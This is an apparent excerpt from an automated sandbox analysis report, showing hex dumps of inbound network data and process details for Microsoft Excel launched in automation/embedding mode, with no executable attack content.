2024-11-26 14:49:26 UTC	8192	IN	Data Raw: 5a c0 4d 96 40 e1 c8 22 8f 52 33 5e 27 f3 21 d9 18 62 c4 75 3d b3 37 52 e0 c6 42 22 95 bb 0c 07 39 48 f5 93 47 d0 90 0f b6 03 fb 25 da 54 b9 a5 e4 df 19 d2 38 30 87 95 d4 b0 fc 23 07 a6 d4 34 ed 27 9c d6 08 ae bc e2 8c 8d e6 ec 76 24 5f 03 00 e9 2b ca f7 e9 a5 3e 91 8e c5 12 82 cf 22 06 2c 39 2b db 05 a4 58 e1 05 59 14 1b e2 fa e6 a6 9e 15 92 23 b8 10 4f 00 2f 71 81 9b 2b c7 05 8d c1 55 ba 8e bc e0 a4 d3 19 81 40 79 ed 58 6d 4c 51 79 eb 09 52 59 b9 b3 db 39 d9 20 84 c8 8e 16 48 d8 10 a7 a9 c0 a4 7a 39 1a 0d a6 42 8d d3 60 00 5d 77 38 b4 41 e0 9a 4a 76 37 e9 dc 3b e6 aa eb 23 75 90 95 06 46 5d c5 87 7b 1d 33 30 80 aa bd ec 13 5e f8 06 82 4f 2a 55 46 da 41 36 77 0e 4e 5b 5e ac da 80 e1 6d 5b b1 3d 31 78 2d e6 de 50 d0 15 64 e6 93 2e f4 50 79 f8 fb 60 66 24 Data Ascii: ZM@"R3^'!bu=7RB"9HG%T80#4'v$_+>",9+XY#O/q+U@yXmLQyRY9 Hz9B`]w8AJv7;#uF]{30^O*UFA6wN[^m[=1x-Pd.Py`f$
2024-11-26 14:49:26 UTC	8192	IN	Data Raw: 0c 58 a8 a2 2c 13 dc 11 cd 76 f7 f8 5e 68 7d e6 35 88 ac 72 6c 5f bb f9 67 6d d6 ed f6 6a fe 17 d7 32 84 12 34 42 40 14 0e 48 05 80 26 8f 34 3a 9c 1a b0 0b 43 92 dc fc b0 34 f5 3a 94 10 33 47 29 df 71 ed bf 75 5a 3f cf 14 7d 53 b4 f2 ea 03 d3 39 63 7f ef 58 3f a1 39 4a 12 a0 55 04 d7 26 bd 87 27 2c f1 88 89 08 6e 89 20 86 04 57 1d fb f5 ed 81 54 08 c4 29 70 b6 40 dc 6f a7 d2 f2 58 42 b3 85 56 12 28 ea c1 48 07 9f 8f 3f 9e 09 9d d0 90 c2 88 f8 7f 5c a2 02 e7 a8 06 89 b3 f0 e7 01 aa 56 31 90 c0 06 50 5e ff 00 84 dd 57 d7 af d7 28 8d b6 c2 dd 73 5e c7 05 0b 5b 10 f6 45 5e 31 1c 42 40 cc 17 6a a8 b1 80 2f 33 71 2b 44 91 ed 97 8b 4b b9 77 c8 48 27 b6 1a 2d 2a b3 07 66 fc 42 c6 41 5d 4c 6c 51 5a d7 f8 4f b6 04 cf 18 fb ab 79 62 c5 8b f7 cf 6d fb 2a 9a 05 d4 7d Data Ascii: X,v^h}5rl_gmj24B@H&4:C4:3G)quZ?}S9cX?9JU&',n WT)p@oXBV(H?\V1P^W(s^[E^1B@j/3q+DKwH'-fBA]LlQZOybm}
2024-11-26 14:49:26 UTC	8192	IN	Data Raw: a4 0a 36 16 0a 84 10 5a b9 07 b6 55 a0 24 f9 b2 d9 0a 79 00 73 ed 7f 1c 95 8d 9e 59 15 56 96 81 56 61 c1 04 57 4c 0c ff 00 13 9e 51 e5 02 77 46 56 98 a8 e1 be 38 ac a2 99 d2 95 4b 05 a5 51 57 9b 3a 9d 2b 34 2b 19 6b 01 40 6b 18 8b e9 01 93 7b 29 63 6a b4 79 3e d8 09 78 7c 86 39 0f 27 71 0d 6b d7 b1 c8 81 1d 57 78 6b 79 14 b3 5f 63 d3 26 5d 39 d3 ea 51 85 8b 62 2a eb 0b fe ce 9a 69 0b 35 a2 f2 78 ba c0 8d 34 86 25 89 1e f7 2b 80 dc fe 2e 0e 46 a3 52 e3 53 14 32 29 a2 e4 ee 04 51 5f 62 32 1e 02 8e 1c d9 da 68 fc ab ae 0e 48 dd 98 39 e4 83 6a 70 07 aa 55 01 5c bb 29 5d ca 42 fb 1e 9c 62 31 07 2b 3b 31 62 a0 0d bd bf d7 6c d2 97 6c ff 00 c2 40 ba 6b ae b8 b8 78 d5 5a 31 4c b6 47 18 09 19 1e 39 37 97 6a 65 04 01 d0 1a ac 89 b5 01 64 52 8c 7d 3c b7 5e 4e 56 68 Data Ascii: 6ZU$ysYVVaWLQwFV8KQW:+4+k@k{)cjy>x\|9'qkWxky_c&]9Qb*i5x4%+.FRS2)Q_b2hH9jpU\)]Bb1+;1bll@kxZ1LG97jedR}<^NVh

Target ID:	0
Start time:	09:48:05
Start date:	26/11/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f7e0000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false